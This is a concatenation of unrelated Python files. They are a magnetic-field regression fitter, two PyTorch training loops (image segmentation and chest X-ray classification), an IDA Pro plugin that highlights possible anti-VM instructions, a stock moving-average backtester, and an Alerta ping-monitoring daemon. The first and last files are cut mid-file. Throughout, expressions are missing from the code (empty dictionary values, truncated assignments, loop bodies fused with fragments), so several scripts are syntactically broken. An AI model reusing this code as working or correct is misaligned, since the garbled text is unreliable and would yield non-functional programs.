100) return (max_dev, max_pct, avg_dev, avg_pct) # IO Df def load_samples(path, cylindrical_axis=True, absolute_axis=True, genvars=[]): sample_cols = ['x', 'y', 'z', 'Bx', 'By', 'Bz'] df = pd.read_csv(path, sep=' ', names=sample_cols) if cylindrical_axis: df['r'] = np.sqrt(df.x**2 + df.y**2) df['p'] = np.arctan2(df.y, df.x) df['Bt'] = np.sqrt(df.Bx**2 + df.By**2) df['Bpsi'] = np.arctan2(df.By, df.Bx) - np.arctan2(df.y, df.x) df['Br'] = df.Bt * np.cos(df.Bpsi) df['Bp'] = df.Bt * np.sin(df.Bpsi) if absolute_axis: df['X'] = np.abs(df.x) df['Y'] = np.abs(df.y) df['Z'] = np.abs(df.z) for var in genvars: df[var] = term(df, var) return df def choose(vars, df1, df2): X1 = df1.loc[:, vars].as_matrix() X2 = df2.loc[:, vars].as_matrix() return (X1, X2) # IO () def run_analysis_for_all_fields(): sample_set = glob("dat_z22/*2k*.sample.dat") test_set = glob("dat_z22/*2k*.test.dat") #print(sample_set, test_set) assert(len(sample_set) == len(test_set) and len(sample_set) > 0) result = pd.DataFrame() for i, sample_file in enumerate(sample_set): trace("run_analysis('%s', '%s')" % (sample_file, test_set[i])) df = run_analysis(sample_file, test_set[i]) result = result.append(df, ignore_index=True) write_header(result) def run_analysis(sample_file = 'dat_z22/tpc2k-z0-q2.sample.dat', test_file = 'dat_z22/tpc2k-z0-q2.test.dat'): global precision, df, test, lr, la, xvars_full, xvars, yvars, X, Y, Xtest, Ytest, ana_result precision = prec_from_pathname(sample_file) assert(precision == prec_from_pathname(test_file)) xvars_full = combinatrial_vars('xyz', 3)[3:] # variables except x, y, z upto 3 dims trace("reading training samples... " + sample_file) df = load_samples(sample_file, genvars=xvars_full) trace("reading test samples..." + test_file) test = load_samples(test_file, genvars=xvars_full) trace("linear regression fit...") lr = sklearn.linear_model.LinearRegression() #ri = sklearn.linear_model.RidgeCV() #la = sklearn.linear_model.LassoCV() fs = sklearn.feature_selection.RFE(lr, 1, verbose=0) #xvars = ['x','y','z','xx','yy','zz','xy','yz','xz','xzz','yzz'] #xvars = ["xx", "yy", "zz", 'x', 'y', 'z', 'xzz', 'yzz'] #xvars = ['xxxr', 'xrrX', 'zzrX', 'p', 'xyrr', 'xzzr', 'xrrY', 'xzrX', 'xxxz', 'xzzr'] #xvars=['x', 'xzz', 'xyz', 'yz', 'yy', 'zz', 'xy', 'xx', 'z', 'y', 'xz', 'yzz'] yvars = ['Bx', 'By', 'Bz'] #yvars = ['Bz'] (Y, Ytest) = choose(yvars, df, test) #(Y, Ytest) = (df['Bz'], test['Bz']) xvars = combinatrial_vars('xyz', 3) # use all terms upto 3rd power (X, Xtest) = choose(xvars, df, test) for y in yvars:, df[y]) res = pd.DataFrame({ "term": xvars, "rank": fs.ranking_ }) trace(y) trace(res.sort_values(by = "rank")) #xvars=list(res.sort_values(by="rank")[:26]['term']), Y) trace(', '.join(yvars) + " = 1 + " + ' + '.join(xvars)) test_dev = deviation_stat(lr.predict(Xtest), Ytest, prec=precision) #for i in range(len(yvars)): # arr = [lr.intercept_[i]] + lr.coef_[i] # arr = [ str(x) for x in arr ] # print(yvars[i] + " = { " + ', '.join(arr) + " }") # print("deviation stat [test]: max %.2e (%.1f%%) avg %.2e (%.1f%%)" % # ( test_dev[0][i], test_dev[1][i], test_dev[2][i], test_dev[3][i] )) (sample_score, test_score) = (lr.score(X, Y), lr.score(Xtest, Ytest)) trace("linear regression R^2 [train data]: %.8f" % sample_score) trace("linear regression R^2 [test data] : %.8f" % test_score) return pd.DataFrame( { "xvars": [xvars], "yvars": [yvars], "max_dev": [test_dev[0]], "max%": [test_dev[1]], "avg_dev": [test_dev[2]], "avg%": [test_dev[3]], "sample_score": [sample_score], "score": [test_score], "coeffs": [lr.coef_], "intercept": [lr.intercept_], "sample_file": [sample_file], "test_file": [test_file], "precision": [precision], "volume_id": [volume_id_from_path(sample_file)] }) def volume_id_from_path(path): return basename(path)\ .replace('.sample.dat', '')\ .replace('-', '_') def get_location_by_volume_id(id): if 'its' in id: r_bin = 0 if 'tpc' in id: r_bin = 1 if 'tof' in id: r_bin = 2 if 'tofext' in id: r_bin = 3 if 'cal' in id: r_bin = 4 z_bin = int(id.split('_')[1][1:]) # "tofext2k_z0_q4" -> 0 if 'q1' in id: quadrant = 0 if 'q2' in id: quadrant = 1 if 'q3' in id: quadrant = 2 if 'q4' in id: quadrant = 3 return r_bin, z_bin, quadrant def write_header(result): #result.to_csv("magfield_params.csv") #result.to_html("magfield_params.html") print("# This file was generated from at " + str( print("# " + ', '.join(result.iloc[0].yvars) + " = 1 + " + ' + '.join(result.iloc[0].xvars)) print("# barrel r: 0 < its < 80 < tpc < 250 < tof < 400 < tofext < 423 < cal < 500") print("# barrel z: -550 < z < 550") print("# phi: 0 < q1 < 0.5pi < q2 < pi < q3 < 1.5pi < q4 < 2pi") print("# header: Rbin Zbin Quadrant Nval_per_compoment(=20)") print("# data: Nval_per_compoment x floats") #print("# R^2: coefficient of determination in multiple linear regression. [0,1]") print("") for index, row in result.iterrows(): #print("// ** %s - R^2 %s" % (row.volume_id, row.score)) print("#" + row.volume_id) r_bin, z_bin, quadrant = get_location_by_volume_id(row.volume_id) print("%s %s %s 20" % (r_bin, z_bin, quadrant)) for i, yvar in enumerate(row.yvars): name = row.volume_id #+ '_' + yvar.lower() print("# precision: tgt %.2e max %.2e (%.1f%%) avg %.2e (%.1f%%)" % (row['precision'], row['max_dev'][i], row['max%'][i], row['avg_dev'][i], row['avg%'][i])) coef = [row['intercept'][i]] + list(row['coeffs'][i]) arr = [ "%.5e" % x for x in coef ] body = ' '.join(arr) #decl = "const double[] %s = { %s };\n" % (name, body) #print(decl) print(body) print("") #write_header(run_analysis()) run_analysis_for_all_fields() #for i in range(10): # for xvars in combinations(xvars_full, i+1): #(X, Xtest) = choose(xvars, df, test), Y), Y), Y), Y) #print xvars #(sample_score, test_score) = (lr.score(X, Y), lr.score(Xtest, Ytest)) #print("linear R^2[sample] %.8f" % sample_score) #print("linear R^2[test] %.8f" % test_score) #(sample_score2, test_score2) = (la.score(X, Y), la.score(Xtest, Ytest)) #print("lasso R^2[sample] %.8f" % sample_score2) #print("lasso R^2[test] %.8f" % test_score2) #print(la.coef_) #for i in range(len(yvars)): # print(yvars[i]) # print(pd.DataFrame({"Name": xvars, "Params": lr.coef_[i]}).sort_values(by='Params')) # print("+ %e" % lr.intercept_[i]) #sample_dev = deviation_stat(lr.predict(X), Y, prec=precision) #test_dev = deviation_stat(lr.predict(Xtest), Ytest, prec=precision) #test_dev2 = deviation_stat(la.predict(Xtest), Ytest, prec=precision) #print("[sample] max %.2e (%.1f%%) avg %.2e (%.1f%%)" % sample_dev) #print("[test] max %.2e (%.1f%%) avg %.2e (%.1f%%)" % test_dev ) #print("lasso [test] max %.2e (%.1f%%) avg %.2e (%.1f%%)" % test_dev2 )
import os import torch import constants from utils.misc import get_learning_rate from utils.summary import TensorboardSummary from utils.loss import SegmentationLosses from utils.calculate_weights import calculate_weights_labels from import DataLoader import numpy as np from utils.metrics import Evaluator from tqdm import tqdm import random class Trainer: def __init__(self, args, model, train_set, val_set, test_set, class_weights, saver): self.args = args self.saver = saver self.saver.save_experiment_config() self.train_dataloader = DataLoader(train_set, batch_size=args.batch_size, shuffle=True, num_workers=args.workers) self.val_dataloader = DataLoader(val_set, batch_size=args.batch_size, shuffle=False, num_workers=args.workers) self.test_dataloader = DataLoader(test_set, batch_size=args.batch_size, shuffle=False, num_workers=args.workers) self.train_summary = TensorboardSummary(os.path.join(self.saver.experiment_dir, "train")) self.train_writer = self.train_summary.create_summary() self.val_summary = TensorboardSummary(os.path.join(self.saver.experiment_dir, "validation")) self.val_writer = self.val_summary.create_summary() self.model = model self.dataset_size = {'train': len(train_set), 'val': len(val_set), 'test': len(test_set)} train_params = [{'params': model.get_1x_lr_params(), 'lr':}, {'params': model.get_10x_lr_params(), 'lr': * 10}] if args.use_balanced_weights: weight = torch.from_numpy(class_weights.astype(np.float32)) else: weight = None if args.optimizer == 'SGD': print('Using SGD') self.optimizer = torch.optim.SGD(train_params, momentum=args.momentum, weight_decay=args.weight_decay, nesterov=args.nesterov) elif args.optimizer == 'Adam': print('Using Adam') self.optimizer = torch.optim.Adam(train_params, weight_decay=args.weight_decay) else: raise NotImplementedError self.lr_scheduler = None if args.use_lr_scheduler: if args.lr_scheduler == 'step': print('Using step lr scheduler') self.lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(self.optimizer, milestones=[int(x) for x in args.step_size.split(",")], gamma=0.1) self.criterion = SegmentationLosses(weight=weight, ignore_index=255, cuda=args.cuda).build_loss(mode=args.loss_type) self.evaluator = Evaluator(train_set.num_classes) self.best_pred = 0.0 def training(self, epoch): train_loss = 0.0 self.model.train() num_img_tr = len(self.train_dataloader) tbar = tqdm(self.train_dataloader, desc='\r') visualization_index = int(random.random() * len(self.train_dataloader)) vis_img, vis_tgt, vis_out = None, None, None self.train_writer.add_scalar('learning_rate', get_learning_rate(self.optimizer), epoch) for i, sample in enumerate(tbar): image, target = sample['image'], sample['label'] image, target = image.cuda(), target.cuda() self.optimizer.zero_grad() output = self.model(image) loss = self.criterion(output, target) loss.backward() self.optimizer.step() train_loss += loss.item() tbar.set_description('Train loss: %.3f' % (train_loss / (i + 1))) self.train_writer.add_scalar('total_loss_iter', loss.item(), i + num_img_tr * epoch) if i == visualization_index: vis_img, vis_tgt, vis_out = image, target, output self.train_writer.add_scalar('total_loss_epoch', train_loss / self.dataset_size['train'], epoch) if constants.VISUALIZATION: self.train_summary.visualize_state(self.train_writer, self.args.dataset, vis_img, vis_tgt, vis_out, epoch) print('[Epoch: %d, numImages: %5d]' % (epoch, i * self.args.batch_size +[0])) print('Loss: %.3f' % train_loss) print('BestPred: %.3f' % self.best_pred) def validation(self, epoch, test=False): self.model.eval() self.evaluator.reset() ret_list = [] if test: tbar = tqdm(self.test_dataloader, desc='\r') else: tbar = tqdm(self.val_dataloader, desc='\r') test_loss = 0.0 visualization_index = int(random.random() * len(self.val_dataloader)) vis_img, vis_tgt, vis_out = None, None, None for i, sample in enumerate(tbar): image, target = sample['image'], sample['label'] image, target = image.cuda(), target.cuda() with torch.no_grad(): output = self.model(image) if i == visualization_index: vis_img, vis_tgt, vis_out = image, target, output loss = self.criterion(output, target) test_loss += loss.item() tbar.set_description('Test loss: %.3f' % (test_loss / (i + 1))) pred = torch.argmax(output, dim=1).data.cpu().numpy() target = target.cpu().numpy() self.evaluator.add_batch(target, pred) Acc = self.evaluator.Pixel_Accuracy() Acc_class = self.evaluator.Pixel_Accuracy_Class() mIoU = self.evaluator.Mean_Intersection_over_Union() mIoU_20 = self.evaluator.Mean_Intersection_over_Union_20() FWIoU = self.evaluator.Frequency_Weighted_Intersection_over_Union() if not test: self.val_writer.add_scalar('total_loss_epoch', test_loss / self.dataset_size['val'], epoch) self.val_writer.add_scalar('mIoU', mIoU, epoch) self.val_writer.add_scalar('mIoU_20', mIoU_20, epoch) self.val_writer.add_scalar('Acc', Acc, epoch) self.val_writer.add_scalar('Acc_class', Acc_class, epoch) self.val_writer.add_scalar('fwIoU', FWIoU, epoch) if constants.VISUALIZATION: self.val_summary.visualize_state(self.val_writer, self.args.dataset, vis_img, vis_tgt, vis_out, epoch) print("Test: " if test else "Validation:") print('[Epoch: %d, numImages: %5d]' % (epoch, i * self.args.batch_size +[0])) print("Acc:{}, Acc_class:{}, mIoU:{}, mIoU_20:{}, fwIoU: {}".format(Acc, Acc_class, mIoU, mIoU_20, FWIoU)) print('Loss: %.3f' % test_loss) if not test: new_pred = mIoU if new_pred > self.best_pred: self.best_pred = new_pred self.saver.save_checkpoint({ 'epoch': epoch + 1, 'state_dict': self.model.state_dict(), 'optimizer': self.optimizer.state_dict(), 'best_pred': self.best_pred, }) return test_loss, mIoU, mIoU_20, Acc, Acc_class, FWIoU#, ret_list def load_best_checkpoint(self): checkpoint = self.saver.load_checkpoint() self.model.load_state_dict(checkpoint['state_dict']) self.optimizer.load_state_dict(checkpoint['optimizer']) print(f'=> loaded checkpoint - epoch {checkpoint["epoch"]})') return checkpoint["epoch"]
<reponame>cercos/masonite from .WebGuard import WebGuard
# encoding: utf-8 # # Default IDA Pro Paths: # MAC /Applications/IDA\ Pro\ X/ # Windows C:\Program Files (x86)\IDA X\plugins # to make it autoexec on openfile # add this to plugins.cfg # ; Other plugins #FullColor 0 0 SILENT # thanks @JR0driguezB for help :) from __future__ import print_function from idautils import Heads from idc import get_segm_start, get_segm_end, print_insn_mnem, get_screen_ea, print_operand, set_color, CIC_ITEM import idaapi #idaapi.auto_wait() PLUGIN_TEST = 1 class FullColor_t(idaapi.plugin_t): flags = idaapi.PLUGIN_UNL comment = "Set colors :)" help = "No help needed" wanted_name = "FullColor" wanted_hotkey = "" def init(self): #idaapi.msg("init() called!\n") return idaapi.PLUGIN_OK def run(self, arg=0): print("hell2") idaapi.msg("run() called with %d!\n" % arg) heads = Heads(get_segm_start(get_screen_ea()), get_segm_end(get_screen_ea())) funcCalls = [] xor = [] antiVM = [] for i in heads: # Color the Calls off-white if print_insn_mnem(i) == "call": funcCalls.append(i) # Color Anti-VM instructions Red and print their location elif print_insn_mnem(i) in ("sidt", "sgdt", "sldt", "smsw", "str", "in", "cpuid"): antiVM.append(i) # Color non-zeroing out xor instructions Orange elif print_insn_mnem(i) == "xor" and (print_operand(i,0) != print_operand(i,1)): xor.append(i) print("Number of calls: %d" % (len(funcCalls))) for i in funcCalls: set_color(i, CIC_ITEM, 0xc7fdff) print("Number of potential Anti-VM instructions: %d" % (len(antiVM))) for i in antiVM: print("Anti-VM potential at %x" % i) set_color(i, CIC_ITEM, 0x0000ff) print("Number of xor: %d" % (len(xor))) for i in xor: set_color(i, CIC_ITEM, 0x00a5ff) def term(self): idaapi.msg("term() called!\n") def PLUGIN_ENTRY(): return FullColor_t() if PLUGIN_TEST: # Create form f = PLUGIN_ENTRY() f.init() f.term()
<reponame>e-ddykim/training_extensions<filename>misc/pytorch_toolkit/chest_xray_screening/chest_xray_screening/ import numpy as np import time import os import argparse import torch from torch.backends import cudnn from torch import optim import torch.nn.functional as tfunc from import DataLoader from torch.optim.lr_scheduler import StepLR from .utils.dataloader import RSNADataSet from .utils.score import compute_auroc from .utils.model import DenseNet121, DenseNet121Eff from math import sqrt import json from tqdm import tqdm as tq class RSNATrainer(): def __init__(self, model, data_loader_train, data_loader_valid, data_loader_test, class_count, checkpoint, device, class_names, lr): self.gepoch_id = 0 self.device = device self.model = self.data_loader_train = data_loader_train self.data_loader_valid = data_loader_valid self.data_loader_test = data_loader_test self.class_names = class_names self.class_count = class_count self.auroc_max = 0.0 # Setting maximum AUROC value as zero self.optimizer = optim.Adam(self.model.parameters(), lr=lr) if checkpoint is not None: model_checkpoint = torch.load(checkpoint) self.optimizer.load_state_dict(model_checkpoint['optimizer']) else: model_checkpoint = None self.loss_fn = torch.nn.BCELoss() def train(self, max_epoch, savepath): train_loss_min = 1e+5 # A random very high number valid_loss_min = 1e+5 for epoch_id in range(max_epoch): print(f"Epoch {epoch_id+1}/{max_epoch}") self.gepoch_id = epoch_id train_loss, valid_loss, auroc_max = self.epoch_train() self.current_train_loss = train_loss self.current_valid_loss = valid_loss timestamp_end = time.strftime("%H%M%S-%d%m%Y") if train_loss < train_loss_min: train_loss_min = train_loss if valid_loss < valid_loss_min: valid_loss_min = valid_loss{'epoch': epoch_id + 1, 'state_dict': self.model.state_dict(), 'best_loss': valid_loss_min, 'optimizer' : self.optimizer.state_dict()}, os.path.join(savepath, f'm-epoch-{epoch_id}.pth')) test_auroc = self.test() print(f"Epoch:{epoch_id + 1}| EndTime:{timestamp_end}| TestAUROC: {test_auroc}| ValidAUROC: {auroc_max}") def valid(self): self.model.eval() loss_valid_r = 0 valid_batches = 0 # Counter for valid batches out_gt = torch.FloatTensor().to(self.device) out_pred = torch.FloatTensor().to(self.device) with torch.no_grad(): for (var_input, var_target) in tq(self.data_loader_valid): var_target = out_gt =, var_target), 0).to(self.device) _, c, h, w = var_input.size() var_input = var_input.view(-1, c, h, w) var_output = self.model( out_pred =, var_output), 0) lossvalue = self.loss_fn( var_output, tfunc.one_hot(var_target.squeeze(1).long(), num_classes=self.class_count).float()) loss_valid_r += lossvalue.item() valid_batches += 1 valid_loss = loss_valid_r / valid_batches auroc_individual = compute_auroc( tfunc.one_hot(out_gt.squeeze(1).long()).float(), out_pred, self.class_count) print(len(auroc_individual)) auroc_mean = np.array(auroc_individual).mean() return valid_loss, auroc_mean def epoch_train(self): loss_train_list = [] loss_valid_list = [] self.model.train() scheduler = StepLR(self.optimizer, step_size=6, gamma=0.002) for batch_id, (var_input, var_target) in tq(enumerate(self.data_loader_train)): var_target = var_input = var_output= self.model(var_input) trainloss_value = self.loss_fn( var_output, tfunc.one_hot(var_target.squeeze(1).long(), num_classes=self.class_count).float()) self.optimizer.zero_grad() trainloss_value.backward() self.optimizer.step() train_loss_value = trainloss_value.item() loss_train_list.append(train_loss_value) if batch_id % (len(self.data_loader_train)-1) == 0 and batch_id != 0: validloss_value, auroc_mean = self.valid() loss_valid_list.append(validloss_value) if auroc_mean > self.auroc_max: print('Better auroc obtained') self.auroc_max = auroc_mean scheduler.step() train_loss_mean = np.mean(loss_train_list) valid_loss_mean = np.mean(loss_valid_list) return train_loss_mean, valid_loss_mean, auroc_mean def test(self): cudnn.benchmark = True out_gt = torch.FloatTensor().to(self.device) out_pred = torch.FloatTensor().to(self.device) self.model.eval() with torch.no_grad(): for i, (var_input, var_target) in enumerate(self.data_loader_test): var_target = var_input = out_gt =, var_target), 0).to(self.device) _, c, h, w = var_input.size() var_input = var_input.view(-1, c, h, w) out = self.model(var_input) out_pred =, out), 0) auroc_individual = compute_auroc(tfunc.one_hot(out_gt.squeeze(1).long()).float(), out_pred, self.class_count) auroc_mean = np.array(auroc_individual).mean() print(f'AUROC mean:{auroc_mean}') for i, auroc_val in enumerate(auroc_individual): print(f"{self.class_names[i]}:{auroc_val}") return auroc_mean def main(args): lr = checkpoint = args.checkpoint batch_size = max_epoch = args.epochs class_count = args.clscount #The objective is to classify the image into 3 classes device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # use gpu if available class_names = ['Lung Opacity', 'Normal', 'No Lung Opacity / Not Normal'] # Data Loader dpath = args.dpath img_pth = os.path.join(args.dpath, 'processed_data/') numpy_path = os.path.join(args.dpath, 'data_split/') with open(os.path.join(dpath, 'rsna_annotation.json')) as lab_file: labels = json.load(lab_file) # Place numpy file containing train-valid-test split on tools folder tr_list = np.load(os.path.join(numpy_path,'train_list.npy')).tolist() val_list = np.load(os.path.join(numpy_path,'valid_list.npy')).tolist() test_list = np.load(os.path.join(numpy_path,'test_list.npy')).tolist() dataset_train = RSNADataSet(tr_list, labels, img_pth, transform=True) dataset_valid = RSNADataSet(val_list, labels, img_pth, transform=True) data_loader_train = DataLoader( dataset=dataset_train, batch_size=batch_size, shuffle=True, num_workers=4, pin_memory=False) data_loader_valid = DataLoader( dataset=dataset_valid, batch_size=batch_size, shuffle=False, num_workers=4, pin_memory=False) dataset_test = RSNADataSet(test_list, labels, img_pth, transform=True) data_loader_test = DataLoader( dataset=dataset_test, batch_size=1, shuffle=False, num_workers=4, pin_memory=False) # Construct Model if args.optimised: alpha = args.alpha phi = args.phi beta = args.beta if beta is None: beta = round(sqrt(2 / alpha), 3) alpha = alpha ** phi beta = beta ** phi model = DenseNet121Eff(alpha, beta, class_count) else: model = DenseNet121(class_count) # Train the Model savepath = args.spath rsna_trainer = RSNATrainer( model, data_loader_train, data_loader_valid, data_loader_test, class_count,checkpoint, device, class_names, lr) rsna_trainer.train(max_epoch, savepath) print("Model trained !") if __name__=="__main__": parser = argparse.ArgumentParser() parser.add_argument("--lr", required=False, help="Learning rate", default=1e-4, type = float) parser.add_argument("--checkpoint", required=False, help="Checkpoint model weight", default= None, type = str) parser.add_argument("--bs", required=False, default=16, help="Batchsize", type=int) parser.add_argument("--dpath", required=True, help="Path to folder containing all data", type =str) parser.add_argument("--epochs", required=False, default=15, help="Number of epochs", type=int) parser.add_argument("--clscount", required=False, default=3, help="Number of classes", type=int) parser.add_argument("--spath", required=True, help="Path to folder in which models should be saved", type =str) parser.add_argument("--optimised", required=False, default=False, help="enable flag->eff model", action='store_true') parser.add_argument("--alpha", required=False, help="alpha for the model", default=(11 / 6), type=float) parser.add_argument("--phi", required=False, help="Phi for the model.", default=1.0, type=float) parser.add_argument("--beta", required=False, help="Beta for the model.", default=None, type=float) custom_args = parser.parse_args() main(custom_args)
import numpy as np import pandas as pd import yfinance as yf import matplotlib.pyplot as plt import datetime from yahoo_fin import stock_info as si plt.rcParams['figure.figsize'] = (15, 10) tickers = si.tickers_dow() individual_stock = input(f"Which of the following stocks would you like to backtest \n{tickers}\n:") num_of_years = 1 start = - datetime.timedelta(days = int(365.25*num_of_years)) yf_prices =, start=start) # Individual Stock Strategy prices = yf_prices['Adj Close'][individual_stock] rs = prices.apply(np.log).diff(1).fillna(0) w1 = 5 w2 = 22 ma_x = prices.rolling(w1).mean() - prices.rolling(w2).mean() pos = ma_x.apply(np.sign) fig, ax = plt.subplots(2,1) ma_x.plot(ax=ax[0], title=f'{individual_stock} Moving Average Crossovers and Positions') pos.plot(ax=ax[1]) my_rs = pos.shift(1)*rs plt.subplots() my_rs.cumsum().apply(np.exp).plot(title=f'{individual_stock} MA Strategy Performance') rs.cumsum().apply(np.exp).plot() plt.legend([f'{individual_stock} MA Performace', f'{individual_stock} Buy and Hold Performnace']) print (f'Performance Statistics for {individual_stock} ({num_of_years} years):') print ('Moving Average Return: ' + str(100 * round(my_rs.cumsum().apply(np.exp).tolist()[-1], 4)) + '%') print('Buy and Hold Return: ' + str(100 * round(rs.cumsum().apply(np.exp).tolist()[-1], 4)) + '%') # Full Portfolio Strategy prices = yf_prices['Adj Close'] rs = prices.apply(np.log).diff(1).fillna(0) w1 = 5 w2 = 22 ma_x = prices.rolling(w1).mean() - prices.rolling(w2).mean() pos = ma_x.apply(np.sign) pos /= pos.abs().sum(1).values.reshape(-1,1) fig, ax = plt.subplots(2,1) ma_x.plot(ax=ax[0], title='Individual Moving Average Crossovers and Positions') ax[0].legend(bbox_to_anchor=(1.1, 1.05)) pos.plot(ax=ax[1]) ax[1].legend(bbox_to_anchor=(1.1, 1.05)) my_rs = (pos.shift(1)*rs) my_rs.cumsum().apply(np.exp).plot(title='Individual Stocks Strategy Performance') print ('-' * 60) print (f'Performance Statistics for {num_of_years} years:') for i in range(len(tickers)): print (f'Moving Average Return for {tickers[i]}: ' + str(100 * round(my_rs.cumsum().apply(np.exp)[tickers[i]].tolist()[-1], 4)) + '%') i = i + 1 plt.subplots() my_rs = (pos.shift(1)*rs).sum(1) my_rs.cumsum().apply(np.exp).plot(title='Full Portfolio Strategy Performance') rs.mean(1).cumsum().apply(np.exp).plot() plt.legend(['Portfolio MA Performace', 'Buy and Hold Performnace']) print ('-' * 60) print (f'Performance Statistics for {tickers} ({num_of_years} years):') print ('Moving Average Return: ' + str(100 * round(my_rs.cumsum().apply(np.exp).tolist()[-1], 4)) + '%') print('Buy and Hold Return: ' + str(100 * round(rs.mean(1).cumsum().apply(np.exp).tolist()[-1], 4)) + '%') # Portfolio Tests # Look-Ahead Bias my_rs1 = (pos*rs).sum(1) my_rs2 = (pos.shift(1)*rs).sum(1) plt.subplots() my_rs1.cumsum().apply(np.exp).plot(title='Full Portfolio Performance') my_rs2.cumsum().apply(np.exp).plot() plt.legend(['With Look-Ahead Bias', 'Without Look-Ahead Bias']) print ('-' * 60) print (f'Performance Statistics for {tickers} ({num_of_years} years):') print ('With Look-Ahead Bias: ' + str(100 * round(my_rs1.cumsum().apply(np.exp).tolist()[-1], 4)) + '%') print('Without Look-Ahead Bias: ' + str(100 * round(my_rs2.cumsum().apply(np.exp).tolist()[-1], 4)) + '%') # Signal Lags lags = range(1, 11) lagged_rs = pd.Series(dtype=float, index=lags) print ('-' * 60) print (f'Lag Performance Statistics for {tickers} ({num_of_years} years):') for lag in lags: my_rs = (pos.shift(lag)*rs).sum(1) my_rs.cumsum().apply(np.exp).plot() lagged_rs[lag] = my_rs.sum() print (f'Lag {lag} Return: ' + str(100 * round(my_rs.cumsum().apply(np.exp).tolist()[-1], 4)) + '%') plt.title('Full Portfolio Strategy Performance with Lags') plt.legend(lags, bbox_to_anchor=(1.1, 0.95)) # Transaction Costs tc_pct = 0.01 delta_pos = pos.diff(1).abs().sum(1) my_tcs = tc_pct*delta_pos my_rs1 = (pos.shift(1)*rs).sum(1) my_rs2 = (pos.shift(1)*rs).sum(1) - my_tcs plt.subplots() my_rs1.cumsum().apply(np.exp).plot() my_rs2.cumsum().apply(np.exp).plot() plt.title('Full Portfolio Performance') plt.legend(['Without Transaction Costs', 'With Transaction Costs']) print ('-' * 60) print (f'Performance Statistics for {tickers} ({num_of_years} years):') print ('Without Transaction Costs: ' + str(100 * round(my_rs1.cumsum().apply(np.exp).tolist()[-1], 4)) + '%') print('With Transaction Costs: ' + str(100 * round(my_rs2.cumsum().apply(np.exp).tolist()[-1], 4)) + '%')
<filename>integrations/pinger/ import sys import platform import time import subprocess import threading import Queue import re import logging import yaml from alertaclient.api import Client __version__ = '3.3.0' LOG = logging.getLogger('alerta.pinger') LOG.setLevel(logging.DEBUG) LOG.addHandler(logging.StreamHandler()) PING_FILE = 'alert-pinger.targets' PING_MAX_TIMEOUT = 15 # seconds PING_MAX_RETRIES = 2 PING_SLOW_WARNING = 200 # ms PING_SLOW_CRITICAL = 500 # ms SERVER_THREAD_COUNT = 20 LOOP_EVERY = 30 _PING_ALERTS = [ 'PingFailed', 'PingSlow', 'PingOK', 'PingError', ] PING_OK = 0 # all ping replies received within timeout PING_FAILED = 1 # some or all ping replies not received or did not respond within timeout PING_ERROR = 2 # unspecified error with ping # Initialise Rules def init_targets(): targets = list()'Loading Ping targets...') try: targets = yaml.load(open(PING_FILE)) except Exception as e: LOG.error('Failed to load Ping targets: %s', e)'Loaded %d Ping targets OK', len(targets)) return targets class WorkerThread(threading.Thread): def __init__(self, api, queue): threading.Thread.__init__(self) LOG.debug('Initialising %s...', self.getName()) self.last_event = {} self.queue = queue # internal queue self.api = api # message broker def run(self): while True: LOG.debug('Waiting on input queue...') item = self.queue.get() if not item:'%s is shutting down.', self.getName()) break environment, service, resource, retries, queue_time = item if time.time() - queue_time > LOOP_EVERY: LOG.warning('Ping request to %s expired after %d seconds.', resource, int(time.time() - queue_time)) self.queue.task_done() continue'%s pinging %s...', self.getName(), resource) if retries > 1: rc, rtt, loss, stdout = self.pinger(resource, count=2, timeout=5) else: rc, rtt, loss, stdout = self.pinger(resource, count=5, timeout=PING_MAX_TIMEOUT) if rc != PING_OK and retries:'Retrying ping %s %s more times', resource, retries) self.queue.put((environment, service, resource, retries - 1, time.time())) self.queue.task_done() continue if rc == PING_OK: avg, max = rtt if avg > PING_SLOW_CRITICAL: event = 'PingSlow' severity = 'critical' text = 'Node responded to ping in %s ms avg (> %s ms)' % (avg, PING_SLOW_CRITICAL) elif avg > PING_SLOW_WARNING: event = 'PingSlow' severity = 'warning' text = 'Node responded to ping in %s ms avg (> %s ms)' % (avg, PING_SLOW_WARNING) else: event = 'PingOK' severity = 'normal' text = 'Node responding to ping avg/max %s/%s ms.' % tuple(rtt) value = '%s/%s ms' % tuple(rtt) elif rc == PING_FAILED: event = 'PingFailed' severity = 'major' text = 'Node did not respond to ping or timed out within %s seconds' % PING_MAX_TIMEOUT value = '%s%% packet loss' % loss elif rc == PING_ERROR: event = 'PingError' severity = 'warning' text = 'Could not ping node %s.' % resource value = stdout else: LOG.warning('Unknown ping return code: %s', rc) continue # Defaults resource += ':icmp' group = 'Ping' correlate = _PING_ALERTS raw_data = stdout try: self.api.send_alert( resource=resource, event=event, correlate=correlate, group=group, value=value, severity=severity, environment=environment, service=service, text=text, event_type='serviceAlert', raw_data=raw_data, ) except Exception as e: LOG.warning('Failed to send alert: %s', e) self.queue.task_done()'%s ping %s complete.', self.getName(), resource) self.queue.task_done() @staticmethod def pinger(node, count=1, interval=1, timeout=5): if timeout <= count * interval: timeout = count * interval + 1 if timeout > PING_MAX_TIMEOUT: timeout = PING_MAX_TIMEOUT if sys.platform == "darwin": cmd = "ping -q -c %s -i %s -t %s %s" % (count, interval, timeout, node) else: cmd = "ping -q -c %s -i %s -w %s %s" % (count, interval, timeout, node) ping = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.STDOUT) stdout = ping.communicate()[0].rstrip('\n') rc = ping.returncode LOG.debug('Ping %s => %s (rc=%d)', cmd, stdout, rc) m ='(?P<loss>\d+(\.\d+)?)% packet loss', stdout) if m: loss ='loss') else: loss = 'n/a' m ='(?P<min>\d+\.\d+)/(?P<avg>\d+\.\d+)/(?P<max>\d+\.\d+)/(?P<mdev>\d+\.\d+)\s+ms', stdout) if m: rtt = (float('avg')), float('max'))) else: rtt = (0, 0) if rc == 0:'%s: is alive %s', node, rtt) else:'%s: not responding', node) return rc, rtt, loss, stdout class PingerDaemon(object): def __init__(self): self.shuttingdown = False def run(self): self.running = True # Create internal queue self.queue = Queue.Queue() self.api = Client() # Initialiase ping targets ping_list = init_targets() # Start worker threads LOG.debug('Starting %s worker threads...', SERVER_THREAD_COUNT) for i in range(SERVER_THREAD_COUNT): w = WorkerThread(self.api, self.queue) try: w.start() except Exception as e: LOG.error('Worker thread #%s did not start: %s', i, e) continue'Started worker thread: %s', w.getName()) while not self.shuttingdown: try: for p in ping_list: if 'targets' in p and p['targets']: for target in p['targets']: environment = p['environment'] service = p['service'] retries = p.get('retries', PING_MAX_RETRIES) self.queue.put((environment, service, target, retries, time.time())) 